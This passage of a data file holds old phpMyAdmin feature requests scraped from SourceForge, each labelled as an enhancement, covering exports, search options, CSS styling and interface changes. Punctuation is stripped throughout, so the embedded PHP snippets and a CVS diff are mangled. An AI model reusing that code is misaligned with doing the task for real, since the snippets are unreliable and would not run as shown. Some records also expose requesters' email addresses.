It maybe also ever displays the 33 , 50 66 Pages This is the behavior the Selector uses.
We are on Page 50 from 100) Pages 1, 3, 6, 10, 15, 30, 45, 47, 48, 49, 50, 51, 52, 53, 55, 70, 85, 90, 94, 97, 100 The Step Size changes, this can be set in relation to the amount of the result.
Steps with the width of percents from the whole amount of data.)
Original URL https sourceforge.net p phpmyadmin feature requests 482 https sourceforge.net p phpmyadmin feature requests 482 Original author finsn","enhancement"
"24444","5182","Support arrays in Data Types.
Can the create table and add column functions support array data types?
Currently you have to select from the list and arrays are not an option.
Thanks.
jc m Original URL https sourceforge.net p phpmyadmin feature requests 483 https sourceforge.net p phpmyadmin feature requests 483 Original author jc m","enhancement"
"24444","5183","Export specific rows from a table.
After doing a SELECT, you might want to export selected rows to a file or somewhere else.
Could be implemented in the page where results are shown.
Even better, export of rows selected using checkboxes next to each rows.
JP jpleveille at webgraphe dot com Original URL https sourceforge.net p phpmyadmin feature requests 485 https sourceforge.net p phpmyadmin feature requests 485 Original author anonymous","enhancement"
"24444","5184","Image Links.
Is there a new version that doesn t use the icon links?
I despise the edit delete empty etc.
icons.
Would just like to see text links.
Is this optional?
Thanks.
Original URL https sourceforge.net p phpmyadmin feature requests 484 https sourceforge.net p phpmyadmin feature requests 484 Original author phpmyass","enhancement"
"24444","5185","Sandwich INSERT statements into a TRANSACTION.
I work time to time with a db that has lots of rows in one table, and I have to export it so others can import it.
It would be nice if there were an option to group those INSERT statements in a transaction.
START TRANSACTION; INSERT INTO TABLE VALUES la , la , la ); repeat 30 thousand times); COMMIT; Thanks guys. )
Original URL https sourceforge.net p phpmyadmin feature requests 486 https sourceforge.net p phpmyadmin feature requests 486 Original author sdibb","enhancement"
"24444","5186","Replace text.
Hello.
Will phpMyAdmin ever support a replace procedure?
It would be great if you could mark columns and tables and replace a string.
I know that MySQL not support replace, but you can make it via php.
Original URL https sourceforge.net p phpmyadmin feature requests 487 https sourceforge.net p phpmyadmin feature requests 487 Original author blackdrake","enhancement"
"24444","5187","OpenGIS datatypes.
Support for the new OpenGIS datatypes in MySQL gt;= 4.1.
See mysql documentation for details http dev.mysql.com doc mysql en Spatial extensions in MySQL.html Original URL https sourceforge.net p phpmyadmin feature requests 488 https sourceforge.net p phpmyadmin feature requests 488 Original author ne0x","enhancement"
"24444","5188","database structure diagram.
It would be very, very useful to automatically generate a structure diagram of the database in pdf or html tables).
It is very time consuming but would be very valuable.
Original URL https sourceforge.net p phpmyadmin feature requests 489 https sourceforge.net p phpmyadmin feature requests 489 Original author anonymous","enhancement"
"24444","5189","put an ob start ) into header.inc.
hi!
I run phpmyadmin on xampp, some version of apache.
problem is it occasionally happens, that a page of phpmyadmin reloads about 50 times within almost no time.
I ve solved that problem by putting a simple ob start ); into he header.inc right at the top.
might be handy if you could put it there yourself, because others like me might be pretty helpless... thanks p.s.
i just put my email here because i was told to tillmannn web.de Original URL https sourceforge.net p phpmyadmin feature requests 490 https sourceforge.net p phpmyadmin feature requests 490 Original author anonymous","enhancement"
"24444","5190","Automated Backup.... Is it possible to add an automated database backup and email ftp function to the backup files, to keep regular backups coming in.
If possible to be run from a cron job ?
Many thanks Simon Original URL https sourceforge.net p phpmyadmin feature requests 491 https sourceforge.net p phpmyadmin feature requests 491 Original author anonymous","enhancement"
"24444","5191","flexible table column width.
it would be nice to have a javascript that makes the table columns resizeable with the mouse windows style like here http www.valdersoft.com flexible table.php only IE).
the tables could have a style= overflow hidden http selfhtml.teamone.de css eigenschaften positionierung.htm overflow so if there is more text than fits into the new size of the tablefield it is hidden.
Original URL https sourceforge.net p phpmyadmin feature requests 492 https sourceforge.net p phpmyadmin feature requests 492 Original author rubo77","enhancement"
"24444","5192","Export from unix command line..
I m running an export batch every night.
The following script is used to do the job.
Is it possible to integrate an export runnable from the command line in phpMyadmin.
I prepared an entry dedicated to the export in the config.inc.php and running it like that php export.php work with phpMyadmin 2.5.0) Sincerly Francois Original URL https sourceforge.net p phpmyadmin feature requests 493 https sourceforge.net p phpmyadmin feature requests 493 Original author ora3114","enhancement"
"24444","5193","Add RLIKE REGEXP to Search.
When doing a Search LIKE is the only search type of it s kind that is an option.
It would be nice to have RLIKE and or REGEXP as valid ways to search as well.
Documentation on these features can be found here.
http dev.mysql.com doc mysql en String comparison f unctions.html Tim Original URL https sourceforge.net p phpmyadmin feature requests 494 https sourceforge.net p phpmyadmin feature requests 494 Original author anonymous","enhancement"
"24444","5194","utf 8 display.
On exploring the benefits of utf 8 encoding in php mysql, i found that despite the native iso 8859 1 code page of my php mysql, use of utf 8 encoded data in the database poses no problems so far.
Would it be possible to offer utf 8 in phpMyAdmin s list of supported encodings, or are issues involved I did not encounter yet?
cheers Original URL https sourceforge.net p phpmyadmin feature requests 495 https sourceforge.net p phpmyadmin feature requests 495 Original author anonymous","enhancement"
"24444","5195","Reorder existing fields.
A feature to reorder existing fields would be cool!
Similar to Add New Field At End Of Table or After ... but with existing fields.
MySQL equivalent ALTER TABLE table MODIFY field3 TEXT NULL AFTER field2; Cheers Chris Original URL https sourceforge.net p phpmyadmin feature requests 496 https sourceforge.net p phpmyadmin feature requests 496 Original author anonymous","enhancement"
"24444","5196","Show if BLOB is NULL.
At the moment BLOB that are NULL are shown as [BLOB] It d be nicer to show them as [BLOB NULL] Original URL https sourceforge.net p phpmyadmin feature requests 497 https sourceforge.net p phpmyadmin feature requests 497 Original author olafvdspek","enhancement"
"24444","5197","Refresh browse, refresh processes.
Two feature requests in one ... a Refresh link for viewing processes would be nice.
Plus, a refresh link would be cool too, when browsing, executing a query, or whatever.
Just having it next to Export at the bottom of the page would be a big help.
Often when running a query, I ll see what results come up, modify something, delete a row or whatever somewhere else, and want to run that same query with that same page returned last page, for example).
Adding some kind of refresh option would help al ot.
thanks guys Original URL https sourceforge.net p phpmyadmin feature requests 498 https sourceforge.net p phpmyadmin feature requests 498 Original author sdibb","enhancement"
"24444","5198","On user creation, warn if the user already exists.
If you create an user with the username of an already exsiting account, but with a different host setup, PMA will create the user bravely , which is correct.
But this may sometimes be an unwanted thing a red warning should be displayed Warning another account with the same username already existed, maybe you d like to check that Reason 2 accounts with the same username but different passwords can cause problems... ) Original URL https sourceforge.net p phpmyadmin feature requests 499 https sourceforge.net p phpmyadmin feature requests 499 Original author swix","enhancement"
"24444","5199","back buttons in privileges screens.
There is a lack of [back] buttons on the privilege pages if you click at the wrong place, you need to go back to home, and start the whole again with the back browser button, there are POST warnings, etc.)
Some buttons links like [back to table privilege], [back to db privilege], [back to main screen] etc.
would be nice to have.
Original URL https sourceforge.net p phpmyadmin feature requests 500 https sourceforge.net p phpmyadmin feature requests 500 Original author swix","enhancement"
"24444","5200","Support for SSL GRANT option.
Any plans on implementing the syntax described here?
http dev.mysql.com doc mysql en Secure GRANT.html Original URL https sourceforge.net p phpmyadmin feature requests 501 https sourceforge.net p phpmyadmin feature requests 501 Original author chutz","enhancement"
"24444","5201","quick hop needed.
in the right frame, on the top, pls add [ server ][ db ][ table ] [GO] server is select box don t submit on change), and db table is just input box, make it possible to quick hop Original URL https sourceforge.net p phpmyadmin feature requests 502 https sourceforge.net p phpmyadmin feature requests 502 Original author xuefer","enhancement"
"24444","5202","Displaying entries in greek.
Hi, When I create a table in greek language and fill in any fields with greek entries then what I get to see when displaying the contents with phpMyAdmin is something like amp; 927; for a greek character.
Is it a bug or a missing feature?
Thanks kajannis web.de Original URL https sourceforge.net p phpmyadmin feature requests 503 https sourceforge.net p phpmyadmin feature requests 503 Original author anonymous","enhancement"
"24444","5203","Frameles version.
I have failed to find the noframes version!
Original URL https sourceforge.net p phpmyadmin feature requests 504 https sourceforge.net p phpmyadmin feature requests 504 Original author anonymous","enhancement"
"24444","5204","Export to another mysql server.
During daily work with phpmyadmin a recurrent operation in our office is open pma on a local source devel) server open pma on a remote target production) server on source, export a few tables data copy with the mouse or save as file) paste on target pma in the sql field.
or using file upload) We could improve that by adding a new target on the export screens now = to display or to file) export to server , with 4 text fields hostname, username, password, database.
As return value, ok or the remote error message should be dislpayed.
comments? )
shouldn t be hard to implement I guess.
first simply with 4 text input fields, later maybe with target server bookmarks ...
Original URL https sourceforge.net p phpmyadmin feature requests 505 https sourceforge.net p phpmyadmin feature requests 505 Original author swix","enhancement"
"24444","5205","Refresh an executed query.
Right next to the [Edit] [Explain SQL] [Create PHP Code] buttons labels in an SQL query, it would be nice with a [Refresh] that executes the exact same query again.
This helps when updating a query if new records have been added to the database meanwhile.
The way I do it now is by selecting reload frame in mozilla, which is a slow way to do it.
Original URL https sourceforge.net p phpmyadmin feature requests 506 https sourceforge.net p phpmyadmin feature requests 506 Original author sharky dk","enhancement"
"24444","5206","Log out should be a button.
I know I may have some trouble pushing this request through with all the Linux heads and otherwise intensely computer oriented folks who maintain phpMyAdmin, and who have no trouble with computerese, but from a standpoint of being friendly to the non techie user, I propose that Login , when it means Identify yourself with a user name and password , should be written Log In , with a space.
For some opinions on this topic, search Google for the following login log in noun verb http www.google.com search?
q= 2Blogin 2B 22log in 22 2Bnoun 2Bverb There is some particularly useful discussion here http www.raycomm.com techwhirl archives 9411 techwhirl 9411 00061.html I agree with those who claim that log in is an action, as in please log in , or as in the label of the button you push to log in Log In ); and that login is a noun, as in please enter your login and password , or an adjective, as in the login page .
I mention this at this point in time because phpMyAdmin now has a Log Out link, which is written Log out , with a space, but retains Login on the login page, and this is inconsistent.
Also inconsistent is that the Log out link is a link, but the Login button is a button.
I propose that they should both be buttons.
This is less important to me, though, than the wording of the Log In button.
If the Log Out link is changed to a button, it may look out of place, having a button directly next to a link the Home link).
Does it make sense then to maybe add a new line to the top of the left frame, something along the lines of Logged in as [username] [[Log Out]] where [[Log Out]] is a button?
That may make it clear what it is that you re logging out of.
Original URL https sourceforge.net p phpmyadmin feature requests 507 https sourceforge.net p phpmyadmin feature requests 507 Original author ryandesign","enhancement"
"24444","5207","CSS styling of PMA tabs.
Hi.
Since PMA 2.6.0 alpha1 and later now offer config.header.inc and config.footer.inc I have been trying to give PMA an interface makeover using CSS.
And I ve noticed a few areas where PMA makes this difficult.
It would be easier to style the tabs at the top of many PMA pages, for example, if the various tab states were given useful CSS classes.
Currently all tabs seem to always have the CSS class set to tab nowrap .
It would be helpful if disabled tabs were identifiable with a CSS class, for example tab disabled nowrap or tab disabled nowrap .
The currently selected tab would also be a good candidate for a CSS class tab hilited nowrap or tab hilited nowrap .
And finally, it would be helpful if the dangerous tabs Empty and Drop would have their own class tab drop nowrap or tab drop nowrap this would make it possible to style the entire tab itself, rather than only the link inside it, as is currently the only possibility.
These changes would be appreciated as they would help simplify the task of restyling PMA.
Original URL https sourceforge.net p phpmyadmin feature requests 508 https sourceforge.net p phpmyadmin feature requests 508 Original author ryandesign","enhancement"
"24444","5208","Add not like as a Search function.
It would be helpful to have a not like function when matching strings using the pma Search feature.
I oftentimes find myself needing to do a not like search.
Original URL https sourceforge.net p phpmyadmin feature requests 509 https sourceforge.net p phpmyadmin feature requests 509 Original author smagruder","enhancement"
"24444","5209","Table Highlighting for Table Overview.
I think it would be relevant to include the Table Highlighting and Selecting on the page where it shows all of your tables in a MySQL DataBase.
Just as you have it on the results page, it should be added to this page too.
Original URL https sourceforge.net p phpmyadmin feature requests 510 https sourceforge.net p phpmyadmin feature requests 510 Original author izcool","enhancement"
"24444","5210","hint to the extended features of maydmin.
there are so many functions in config.inc.php that are disabled by default.
most users don`t know of them, so put a warning on the main page when you are logged in as root and functions are disabled like the query history, bookmarks, the show all button in the select page... and a link to a page, where you see the most usefull options that can be changed easily.
Or maybe put an alternate config.inc file in the download, that has enabled all functionality, so you can switch to that config right after installing the newest version and put a hint to that an the main page too) Original URL https sourceforge.net p phpmyadmin feature requests 511 https sourceforge.net p phpmyadmin feature requests 511 Original author rubo77","enhancement"
"24444","5211","Better default queries.
it would be nice to have a default query that contains already all the tablefields like cfg[ DefaultQueryTable ] = SELECT f FROM t WHERE 1 ; where f is a list of all fields like id, name, adress, tel, ... at the moment in config.inc.php there is a section Default queries.
d will be replaced by database name t will be replaced by table name cfg[ DefaultQueryTable ] = SELECT FROM t WHERE 1 ; cfg[ DefaultQueryDatabase ]= ; Original URL https sourceforge.net p phpmyadmin feature requests 512 https sourceforge.net p phpmyadmin feature requests 512 Original author rubo77","enhancement"
"24444","5212","colorsets.
in config.inc.php, there should be a selection of colorsets for phpmyadmin to chose from.
i reprogrammed the disign section here in the attached file.
an extra option circling would be nice, where every table database gets its own colorset.
this way the eye will get used to certain colors for certain tables and the whole interface is a bit more intuitive.
sure, the colorsets should all be unobtrusive ;) Original URL https sourceforge.net p phpmyadmin feature requests 513 https sourceforge.net p phpmyadmin feature requests 513 Original author rubo77","enhancement"
"24444","5213","Query Window Box....
I would suggest to update the Query Window Box on the Interface of phpMyAdmin.
Right now it looks sorta dull in my opinion as there s only a link.
I would suggest to add the CSS Link Rollover, just like in every other page in phpMyAdmin; and to add a small graphic to the left of the link perhaps.
I believe that this will look a bit better and give it a little more pizaz, if you know what I mean.
Original URL https sourceforge.net p phpmyadmin feature requests 514 https sourceforge.net p phpmyadmin feature requests 514 Original author izcool","enhancement"
"24444","5214","Timestamp when page was loaded.
I ve seen this suggested several times before A refresh link.
But I think what would help more is a timestamp on the bottom of each phpMyAdmin page maybe except for the pages on the left frame, perhaps every other page if possible) that tells when the page was loaded.
You can have this and a refresh link next to it.
Perhaps in the configuration file you can set what certain PHP date ) settings are called such as Ymd h i s, etc), and as well as a way to convert to a certain time zone.
That would be really neat. )
Original URL https sourceforge.net p phpmyadmin feature requests 515 https sourceforge.net p phpmyadmin feature requests 515 Original author izcool","enhancement"
"24444","5215","Change of colums in for adding creating fields.
Another idea just struck me.
Well, this has always happened to me and I thought that others may like it.
When you are creating a new database table, and you already are in the page with the rows to set names and properties to, I normally end up by over counting as in I don t need it) or I miscounted one as I just realized that I forgot.
On that page where you set the properties to your new table, there should be an option somewhere near the bottom where you can add or remove rows in your new table while saving all the information you already typed in.
I know it may sound a little confusing, but this is the best way that I can explain it.
I m guessing that it may take a bit to add, but it will help me and others in the long run.
Original URL https sourceforge.net p phpmyadmin feature requests 516 https sourceforge.net p phpmyadmin feature requests 516 Original author izcool","enhancement"
"24444","5216","Select All Unselect All.... Now that I m looking at the MySQL DataBase Tables page, I see that there is an option to Select All and to Unselect All.
How about adding the same thing when you are browsing a table ?
Wouldn t it be much easier if you needed to select many on the same page ?
Original URL https sourceforge.net p phpmyadmin feature requests 517 https sourceforge.net p phpmyadmin feature requests 517 Original author izcool","enhancement"
"24444","5217","New Version Available Message.... Hmm, I m not sure if this will be the best idea that I ve had yet, but I thought this might be useful to some people.
On the front page, under the phpMyAdmin section of the table, you can include an area where it tells you that You have the latest version of phpMyAdmin or A new version of phpMyAdmin is available with a link to download the latest version.
Though some servers have phpMyAdmin already installed on it, not by them, so I don t think this might be useful there.
Also, the phpMyAdmin website would have to use a textfile in order to check if it s the latest version.
So, it s just an idea right now, but it would be nice to see. )
P.S.
I love how that phpMyAdmin 2.6.0 alpha 3 has a really nice updated interface. )
Original URL https sourceforge.net p phpmyadmin feature requests 518 https sourceforge.net p phpmyadmin feature requests 518 Original author izcool","enhancement"
"24444","5218","Default length for varchar.
if you create a new table and you add for example 20 fields with all varchar type it is quite much work to enter all the time the Length Values .
it would be nice if there is a senseful default already in the value field like 255 for example, or better a javascript stores the last entered Length Value in a variable and if you select the same type again in another field, the Length Value is automatically copied into that field.
if you want, i can code that javascript Original URL https sourceforge.net p phpmyadmin feature requests 519 https sourceforge.net p phpmyadmin feature requests 519 Original author rubo77","enhancement"
"24444","5219","SUM and AVG in browse table view.
i think to people with not such a great skill in SQL there should be offered more of the great functionlalities that SQL Queries have.
a dropdownbox underneath the table in the browse view with all fields of that table and a second option if you want to see SUM ), COUNT ), MIN ), MAX ) or AVG ) of all fields with a numeric type grouped by the field selected in the first dropdownbox if you press that button, you will be led to the page with a query like this SELECT field 1, SUM field 2), SUM field 3), SUM field 4) FROM `table x`GROUP BY field 1 more functionality could be offered for example date sort Queries or date select funcions like FROM UNIXTIME ) or DATE FORMAT ) see http dev.mysql.com doc mysql en Date and time functions.html ) Original URL https sourceforge.net p phpmyadmin feature requests 520 https sourceforge.net p phpmyadmin feature requests 520 Original author rubo77","enhancement"
"24444","5220","Bad New Logo.
The new logo shown in the demo on your site is tarrible.
Stick with the old one.
It looks better and has history.
The new one is sloppy and almost illedgible.
Original URL https sourceforge.net p phpmyadmin feature requests 521 https sourceforge.net p phpmyadmin feature requests 521 Original author kidmedia","enhancement"
"24444","5221","limit to table prefixes in left frame.
cfg[ Servers ][ i][ only prefix ] = ; If set to a prefix, only tables are displayed in left frame that start with this prefix, It may also be an array of prefixes, where sorting order is relevant.
Original URL https sourceforge.net p phpmyadmin feature requests 522 https sourceforge.net p phpmyadmin feature requests 522 Original author rubo77","enhancement"
"24444","5222","calculate left frame width.
you could add auto to the configuration variable cfg[ LeftWidth ] = 150; left frame width in pixel or auto if you calculate the width of the table with the longest name.
here is a function to get the lenth of a string without using GDlib function pixellen str)\{ gets the approximate length of a string in pixel it is calculated for the font arial and fontsize 12, but it works as a measurement for all sizes and most fonts have similar proportions b[1]= ilI ;,.!
; b[2]= j[] ; b[3]= frt )\{\}1 ; b[4]= kJ ; b[5]= abcdeghnopqsuvxyzEFLPTxc2xa7 =?
234567890xc3xa4xc3xb6xc3xbc ; b[6]= BCDHKNRSUXZ xc3x9fxc3x9c ; b[7]= mAGMOQVYxc3x84xc3x96 ; b[8]= ; b[9]= w ; b[10]= ; b[11]= W ; for i=0; i lt;strlen str); i ) for each letter found=0; for j=1; j lt;=11; j ) if strstr b[ j], str[ i])) pixel= pixel j; found=1; continue; endfor; if found==0) pixel =5; all other characters endfor; change the factor to fit your font or just use the result as a measure factor=1.5; return pixel factor); \} Original URL https sourceforge.net p phpmyadmin feature requests 523 https sourceforge.net p phpmyadmin feature requests 523 Original author anonymous","enhancement"
"24444","5223","Auto increment values reorganising.
This is just a small suggestion but would be very valueable to keeping a database organized, neat, and possibly for large databases reducing the size.
My idea is if you have a primary key that just does 1, 2, 3, 4, with the auto inc feature that there would be a link to reorganize them.
Sometimes you have to delete them, or just when testing you skip around so its 1, 2, 45, 48, 49, 51 what about something that reorgainizes them into 1, 2, 3, 4, 5.
It would be somewhat simple to code and you could always put a big warning at the top about what this does and to make sure your using it on the right field.
In my opinion this would be an extreamly useful feature.
Thanks Derek admin mclamb.us Original URL https sourceforge.net p phpmyadmin feature requests 524 https sourceforge.net p phpmyadmin feature requests 524 Original author mclamb","enhancement"
"24444","5224","foreach should be foreach .
some is A. foreach and some is B. foreach as other structs if while, all have space after them, it should be the form B. not a big issue ) Original URL https sourceforge.net p phpmyadmin feature requests 525 https sourceforge.net p phpmyadmin feature requests 525 Original author xuefer","enhancement"
"24444","5225","simple sort for server processlist.php.
Index server processlist.php ========================================== ========================= RCS file cvsroot phpmyadmin phpMyAdmin server processlis t.php,v retrieving revision 2.7 diff u r2.7 server processlist.php server processlist.php 20 May 2004 16 14 08 0000 2.7 server processlist.php 23 May 2004 16 06 38 0000 47,6 47,7 unset res); unset row); PMA sortRows serverProcesses, Time , SORT DESC | SORT NUMERIC); Displays the page Original URL https sourceforge.net p phpmyadmin feature requests 527 https sourceforge.net p phpmyadmin feature requests 527 Original author xuefer","enhancement"
"24444","5226","distinct colors for each table.
it would be nice to have a color, that belongs to each table.
this would make it easyer for the eye to differentiate between the tables.
you could change header.inc.php in line 145 to if !empty GLOBALS[ table ])) \{ echo .
GLOBALS[ strTable ] .
lt;i gt; lt;a class= h1 href= .
GLOBALS[ cfg ][ DefaultTabTable ] .
header url qry .
amp;amp;db= .
urlencode GLOBALS [ db ]) .
amp;amp;table= .
urlencode GLOBALS[ table ]) .
style= color ; echo word2color GLOBALS[ table ]); echo gt; .
htmlspecialchars GLOBALS [ table ]) .
lt; a gt; lt; i gt; .
\n ; \} this is the used function function word2color w)\{ if strlen w)==0) return substr 00000 .
dechex mt rand 0, 0xffffff)), 6); while strlen w) lt;6) w.= w; minbrightness=1; range from 0 to 15, if this is 0 then for ex.
black is allowed max brightness=13; range from 0 to 15, if this is 15 then for ex.
white is allowed plus red=0; set one of these to set the probability of one of these colors higher plus green=0; plus blue=0; for i=0; i lt;6; i ) \{ r.= gt; ; this is a depug mode, to see the color written plus=0; if plus red lt; gt;0 and i==0) plus= plus red; if plus green lt; gt;0 and i==2) plus= plus green; if plus blue lt; gt;0 and i==4) plus= plus blue; c= w[round strlen w) 6 i)]; dec=ord c) max brightness plus minbrightness) minbrightness plus; if dec gt; max brightness minbrightness) dec= max brightness minbrightness; r.= strtoupper dechex dec) ); \} return r; \} Original URL https sourceforge.net p phpmyadmin feature requests 528 https sourceforge.net p phpmyadmin feature requests 528 Original author rubo77","enhancement"
"24444","5227","checkbox in leftframe to bookmark a database directly.
a checkbox in the left frame should open the select form in the top frame to have the url bookmarkeable only when there is no database selected ) like in this testserver http www.hirnbrand.de test phpMyAdmin 2.6.0 alpha2 these are the changed lines from line 672) echo lt;noscript gt; lt;input type= submit name= Go value= .
strGo .
gt; lt; noscript gt; .
\n ; if !
table list) \{ table list = lt;div gt; .
strSelectADb .
lt; div gt; .
\n ; echo lt;table cellpadding= 0 cellspacing= 0 border= 0 gt; .
\n ; echo lt;tr gt; .
\n ; echo lt;td valign= top gt; lt;input onclick= if this.checked) \{this.form.action=\ index.php\ ;this.form.target=\ top\ ;this.form.target=\ top\ ; this.form.method=\ get\ \} type= Checkbox value= 1 name= createlink gt; lt; td gt; .
\n ; echo lt;td gt;create a link for this database lt; td gt; .
\n ; echo lt; tr gt; .
\n ; echo lt; table gt; .
\n ; \} echo lt; form gt; .
\n ; Original URL https sourceforge.net p phpmyadmin feature requests 526 https sourceforge.net p phpmyadmin feature requests 526 Original author rubo77","enhancement"
"24444","5228","Differentiate what user failed.
We currently fire same error whether normal user or control user connecting failed.
There should be at least different message.
Original URL https sourceforge.net p phpmyadmin feature requests 529 https sourceforge.net p phpmyadmin feature requests 529 Original author nijel","enhancement"
"24444","5229","Show Fieldnames in Querys.
Hello, i had following idea i write a PHP script und i use phpmyadmin.
Good Script doesn`t have a `Select xc2xb4 Clause, they list a row of fields.
So, it es great, when i can copy such a string from phpmyadmin to my String.
I built this idea in the version, i installed at my computer and it works how i expected.
for exampel I changed following code in tbl query box.
php old lt;?php echo !empty query to display)) ?
htmlspecialchars query to display) SELECT FROM .
htmlspecialchars PMA backquote table)) .
WHERE 1 ); ?
gt; new lt;?php felder = ; rpresult = PMA mysql query SHOW FIELDS FROM .
PMA backquote db) .
.
.
PMA backquote table) ); while rprow = PMA mysql fetch array rpresult)) \{ felder .= felder ?
, .
rprow[ Field ] rprow[ Field ]; \} echo !empty query to display)) ?
htmlspecialchars query to display) SELECT .
felder .
FROM .
htmlspecialchars PMA backquote table)) .
WHERE 1 ); ?
gt; for more information, you can look at http renephoenix.de index.php?cmd=newkomm bid=346 or contact me at mail.renephoenix.de nice greeting to the PMA Team Renxc3xa9 Original URL https sourceforge.net p phpmyadmin feature requests 531 https sourceforge.net p phpmyadmin feature requests 531 Original author anonymous","enhancement"
"24444","5230","configurable default values???.
Hello, you have put standard default value for date 0000 00 00 00 00 00 when I try do export the data saved to other databases like ms sql.
ms sql and other dbms does not support this default value.
Could you implement default value configuration or change the default value for date????
I think other people will have the same problem some time.
I am trying to change my programm to function with other dbms.
my programm is using often 0000 00 00 .. value if there is a value.
regards michael michael.ribeiro zmail.pt Original URL https sourceforge.net p phpmyadmin feature requests 530 https sourceforge.net p phpmyadmin feature requests 530 Original author anonymous","enhancement"
"24444","5231","Multiple DB sql query.
I run multiple websites on a server and I use the same code across multiple databases.
I thought it would be nice to be able to execute a query across multiple databases and to possibly pick and choose which databases to apply the query.
Original URL https sourceforge.net p phpmyadmin feature requests 532 https sourceforge.net p phpmyadmin feature requests 532 Original author luegner","enhancement"
"24444","5232","CSS class for server db table header.
Could you give a unique CSS class to the server whatever gt; database whatever gt; table whatever header at the top of most pages in the right frame?
That would enable me to more easily apply a different visual appearance to it in a custom CSS file I m developing.
Original URL https sourceforge.net p phpmyadmin feature requests 533 https sourceforge.net p phpmyadmin feature requests 533 Original author ryandesign","enhancement"
"24444","5233","Custom CSS.
The new config.header and config.footer files that debut with PMA 2.6.0 are very nice and I m using them to help me restyle PMA with new CSS definitions.
But these header and footer files are only included on the files loaded into the right frame.
Would you consider providing something similar for the left frames and the popup windows?
I primarily just want to be able to stuff some new CSS definitions into all the PMA pages, regardless of which frame or popup window they load into.
If a config file directive were available which provided this capability, separate header and footer files for the pages in the left frames and popup windows would not be needed.
This kind of custom CSS file should be loaded in addition to the standard PMA file, I think, so that the server administrator need only write into the CSS file those directives that differ from the standard distribution, rather than duplicating many directives that would be identical.
Original URL https sourceforge.net p phpmyadmin feature requests 534 https sourceforge.net p phpmyadmin feature requests 534 Original author ryandesign","enhancement"
"24444","5234","Add FOREIGN KEY CHECKS=0 to Exports.
When you export a set of tables that contain Foreign Keys, you can run into a Referential Integrity problem when you try to reload the files especially if this is a migration where the tables do not yet exist).
This situation can be avoided by just injecting a SET FOREIGN KEY CHECKS=0 at the start of the Export file and a SET FOREIGN KEY CHECKS=1 at the end.
BTW mysqldump in 4.1 does this automatically so you should too there is no harm in having it if not needed).
Original URL https sourceforge.net p phpmyadmin feature requests 535 https sourceforge.net p phpmyadmin feature requests 535 Original author rarpsl mysql","enhancement"
"24444","5235","Use Spreadsheet Excel Writer for export.
It would be nice to have an option where multiple tables of a database could be exported as separate sheets in one Excel file.
A CSV export is clearly not sufficient for this, but there is a PEAR module called Spreadsheet Excel Writer which allows this and some other neat options, including some formatting.
Perhaps this could be made an option in the export screen.
It could even be conditionalized, so that the option to export a real Excel file is not available unless this PEAR module is installed.
Using this Excel export module should also fix the fact that Excel for Mac and Excel for Windows require differing CSV formats to work properly.
It would simplify the task of exporting something that everyone can open in Excel, while at the same time making it a more pleasant experience through some simple formatting like bolding the column headers, or whatever).
The only problem is that the PEAR module is beta, and this may be of concern to some.
But I have used it successfully in other projects.
See also bug 951226 where this feature request was first voiced.
Original URL https sourceforge.net p phpmyadmin feature requests 536 https sourceforge.net p phpmyadmin feature requests 536 Original author ryandesign","enhancement"
"24444","5236","Import of old config files needs to be documented.
It s getting tedious to diff the config.inc.php file every time I update PMA.
I maintain a copy of PMA on half a dozen different servers, and I frequently update to the latest CVS version on my development machine, so I spend a considerable amount of time diffing the old and new config.inc files.
I m trying out a PHP MySQL based bug tracker called Mantis http www.mantisbt.org ) whose configuration strategy I like better.
It works like this they have a config.defaults file in their distribution, containing default values for all configurable options.
Then they include a suggested config.inc file, including just the configuration options that must be changed like server addresses and passwords and admin email addresses).
Values that are defined in the config.inc override values in the config.defaults file.
This has an advantage over the PMA strategy when updating, the user can simply copy their config.inc from the old distribution to the new one.
Any new options that became available get assigned to appropriate default values through the config.defaults file.
There should ideally be a way for PMA to indicate to the admin when new configurable options become available.
But maybe that s something best left for when PMA has a way to update itself via a command line script or via the web interface.
I believe there s another feature request out on that.
Original URL https sourceforge.net p phpmyadmin feature requests 537 https sourceforge.net p phpmyadmin feature requests 537 Original author ryandesign","enhancement"
"24444","5237","Checkbox for droping indexes.
Can we get checkboxes like the ones that exist for the tables) to drop multiple indexes at once?
This would be great.
Thanks in advance!
Original URL https sourceforge.net p phpmyadmin feature requests 538 https sourceforge.net p phpmyadmin feature requests 538 Original author anonymous","enhancement"
"24444","5238","Define sort order for sorting tables.
Operations | Alter table order by It would be really useful to add asc and desc as options for this function.
asc is the default.
ALTER TABLE `GeneralCalendar` ORDER BY `eventid` desc; ALTER TABLE `GeneralCalendar` ORDER BY `eventid` asc; In my case, eventid is a date and would be useful to keep the most recent entries at the top of the database.
Being that this is an Open Source effort, I know someone else would appreciate this improvement.
Original URL https sourceforge.net p phpmyadmin feature requests 539 https sourceforge.net p phpmyadmin feature requests 539 Original author jtjohnston","enhancement"
"24444","5239","SHA1 function.
hi, it seems the ability to insert data with the SHA SHA1 function is not available in 2.5.7. according to the mysql manual, this function is cryptographically more secure than MD5 ) and it would be great if it could be made available in phpMyAdmin.
thanks for a fantastic product!
best regards, Daniel Netz Original URL https sourceforge.net p phpmyadmin feature requests 540 https sourceforge.net p phpmyadmin feature requests 540 Original author kirigoe","enhancement"
"24444","5240","Add Option to Disable Foreign Key Checks in the Export Page.
It would be useful to add an option to the Export page of PHPMyAdmin that is a check box called something like Add disable foreign key checks .
Then when the user would check the box he would get an exported sql file that has SET FOREIGN KEY CHECKS=0; at the beginning of the file, and SET FOREIGN KEY CHECKS=1; at the end of the file.
This helps immensely when moving data between InnoDB tables, it also speeds up importing by a lot.
Thanks.
Original URL https sourceforge.net p phpmyadmin feature requests 541 https sourceforge.net p phpmyadmin feature requests 541 Original author anonymous","enhancement"
"24444","5241","icon free theme.
Themes may look cool , but are just making everything slower...
So for people really willing to work with phpmyadmin, an image free theme would be good.
Original URL https sourceforge.net p phpmyadmin feature requests 542 https sourceforge.net p phpmyadmin feature requests 542 Original author anonymous","enhancement"
"24444","5242","convert data value to upper case.
how i can convert lower case data value to upper case data value?
eg.
VARCHAR 255) column contain 18,000 lower case data to upper case data?
thanks in advance... my the success always be with you.....
Original URL https sourceforge.net p phpmyadmin feature requests 543 https sourceforge.net p phpmyadmin feature requests 543 Original author anonymous","enhancement"
"24444","5243","Emailing Changes.
anyway you can add a feature that emails the changes done to a specific email address?
Jon jon videoguys.com Original URL https sourceforge.net p phpmyadmin feature requests 544 https sourceforge.net p phpmyadmin feature requests 544 Original author anonymous","enhancement"
"24444","5244","able to dblclick on query to select query.
after a query is executed including create table etc) the query is shown up.
